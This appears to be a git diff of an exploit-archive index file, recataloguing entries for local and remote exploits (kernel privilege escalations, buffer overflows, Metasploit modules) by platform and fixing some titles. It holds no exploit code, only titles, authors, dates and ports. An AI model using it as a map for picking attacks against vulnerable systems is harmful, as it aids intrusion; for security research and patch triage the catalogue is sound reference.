40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
|
||||
39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
|
||||
39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
|
||||
40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0
|
||||
40337,platforms/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",win_x86-64,local,0
|
||||
39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
|
||||
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
|
||||
|
@ -8597,7 +8597,7 @@ id,file,description,date,author,platform,type,port
|
|||
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
|
||||
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
|
||||
39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0
|
||||
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
|
||||
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
|
||||
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
|
||||
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
|
||||
39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0
|
||||
|
@ -8620,7 +8620,7 @@ id,file,description,date,author,platform,type,port
|
|||
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
|
||||
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
|
||||
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
|
||||
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
|
||||
39984,platforms/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,win_x86-64,local,0
|
||||
39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0
|
||||
40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
|
||||
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
|
||||
|
@ -8630,7 +8630,7 @@ id,file,description,date,author,platform,type,port
|
|||
40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0
|
||||
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0
|
||||
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
|
||||
40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,linux,local,0
|
||||
40049,platforms/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,lin_x86-64,local,0
|
||||
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
|
||||
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
|
||||
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
|
||||
|
@ -8647,7 +8647,7 @@ id,file,description,date,author,platform,type,port
|
|||
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
|
||||
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
|
||||
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
|
||||
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
|
||||
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
|
||||
|
@ -8731,7 +8731,7 @@ id,file,description,date,author,platform,type,port
|
|||
40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
|
||||
40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
|
||||
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
|
||||
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
|
||||
40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
|
||||
40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
|
||||
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
|
||||
40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
|
||||
|
@ -8742,7 +8742,7 @@ id,file,description,date,author,platform,type,port
|
|||
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
|
||||
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
|
||||
40871,platforms/lin_x86-64/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,lin_x86-64,local,0
|
||||
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
|
||||
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
|
||||
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
|
||||
|
@ -8759,7 +8759,7 @@ id,file,description,date,author,platform,type,port
|
|||
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
|
||||
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
|
||||
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
|
||||
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
|
||||
41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0
|
||||
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
|
||||
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
|
||||
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
|
||||
|
@ -8774,6 +8774,7 @@ id,file,description,date,author,platform,type,port
|
|||
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
|
||||
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
|
||||
41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
|
||||
41207,platforms/windows/local/41207.txt,"Viscosity 1.6.7 - Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -8902,7 +8903,7 @@ id,file,description,date,author,platform,type,port
|
|||
263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
|
||||
266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
|
||||
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
|
||||
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21
|
||||
269,platforms/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21
|
||||
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
|
||||
277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
|
||||
279,platforms/linux/remote/279.c,"BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
|
||||
|
@ -8927,7 +8928,7 @@ id,file,description,date,author,platform,type,port
|
|||
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0
|
||||
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
|
||||
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
|
||||
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23
|
||||
346,platforms/linux_sparc/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux_sparc,remote,23
|
||||
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
|
||||
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
|
||||
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
|
||||
|
@ -9165,7 +9166,7 @@ id,file,description,date,author,platform,type,port
|
|||
1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0
|
||||
1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0
|
||||
1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
|
||||
1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
|
||||
1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0
|
||||
1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21
|
||||
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21
|
||||
1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
|
||||
|
@ -9303,7 +9304,7 @@ id,file,description,date,author,platform,type,port
|
|||
2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0
|
||||
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
|
||||
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
|
||||
2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80
|
||||
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
|
||||
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
|
||||
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
|
||||
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
|
||||
|
@ -9419,7 +9420,7 @@ id,file,description,date,author,platform,type,port
|
|||
3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
|
||||
3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0
|
||||
3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0
|
||||
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53
|
||||
3615,platforms/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53
|
||||
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
|
||||
3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143
|
||||
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
|
||||
|
@ -9972,10 +9973,10 @@ id,file,description,date,author,platform,type,port
|
|||
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution",2009-04-29,Arr1val,linux,remote,0
|
||||
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0
|
||||
8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote,0
|
||||
8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
|
||||
8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
|
||||
8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0
|
||||
8623,platforms/windows/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0
|
||||
8613,platforms/win_x86/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
|
||||
8614,platforms/win_x86/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
|
||||
8621,platforms/win_x86/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,win_x86,remote,0
|
||||
8623,platforms/win_x86/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,win_x86,remote,0
|
||||
8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0
|
||||
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
|
||||
8696,platforms/hardware/remote/8696.txt,"Multiple D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0
|
||||
|
@ -10841,7 +10842,7 @@ id,file,description,date,author,platform,type,port
|
|||
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
|
||||
16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
|
||||
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
|
||||
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
|
||||
16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100
|
||||
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
|
||||
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
|
@ -10865,12 +10866,12 @@ id,file,description,date,author,platform,type,port
|
|||
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
|
||||
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16738,platforms/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
|
||||
16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
|
||||
16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21
|
||||
16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
|
||||
16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
|
||||
16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
|
||||
16743,platforms/win_x86/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
|
||||
16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203
|
||||
16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202
|
||||
16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093
|
||||
|
@ -10904,16 +10905,16 @@ id,file,description,date,author,platform,type,port
|
|||
16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0
|
||||
16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
|
||||
16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0
|
||||
16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
|
||||
16777,platforms/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
|
||||
16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881
|
||||
16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800
|
||||
16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0
|
||||
16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
|
||||
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
|
||||
16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0
|
||||
16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
|
||||
16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
|
||||
16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
|
||||
16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144
|
||||
16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144
|
||||
16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0
|
||||
16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,multiple,remote,8080
|
||||
16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
|
||||
|
@ -10950,7 +10951,7 @@ id,file,description,date,author,platform,type,port
|
|||
16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25
|
||||
16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389
|
||||
16824,platforms/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389
|
||||
16825,platforms/windows/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
|
||||
16825,platforms/win_x86/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
|
||||
16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292
|
||||
16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
|
||||
